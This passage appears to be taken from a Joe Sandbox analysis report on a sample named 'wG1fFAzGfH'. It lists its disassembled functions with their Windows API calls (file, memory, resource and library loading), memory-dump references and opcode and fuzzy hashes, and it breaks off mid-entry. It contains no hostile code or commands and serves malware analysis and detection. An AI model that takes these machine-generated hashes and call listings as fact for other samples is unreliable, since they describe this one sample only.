Function 0045CF00 Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AllocDecompressInitVirtualZ2_bz
String ID:
API String ID: 3582128297-0
Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8

Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD

Function 004522E0 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileLastMove
String ID:
API String ID: 55378915-0
Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598

Function 00451DD0 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598

Function 00451F68 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598

Function 00452140 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588

Function 0045CFF4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046

Strings

bzlib: Too much memory requested, xrefs: 0045D021

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AllocVirtual
String ID: bzlib: Too much memory requested
API String ID: 4275171209-1500031545
Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C

Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00423259
LoadCursorA.USER32(00000000,00000000), ref: 00423283

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D

Function 0042E2BC Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928

Function 0044FF58 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF6E
GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF76

Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9

Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603

Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98

Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6

Function 0046B4C8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A

Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$A5940CurrentEnablePathPrepareThreadWrite
String ID:
API String ID: 3104224314-0
Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE

Function 00440BE8 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00440BFF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58

Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1

Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Function 0042CC98 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558

Function 0044FE24 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9

Function 0042E73C Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

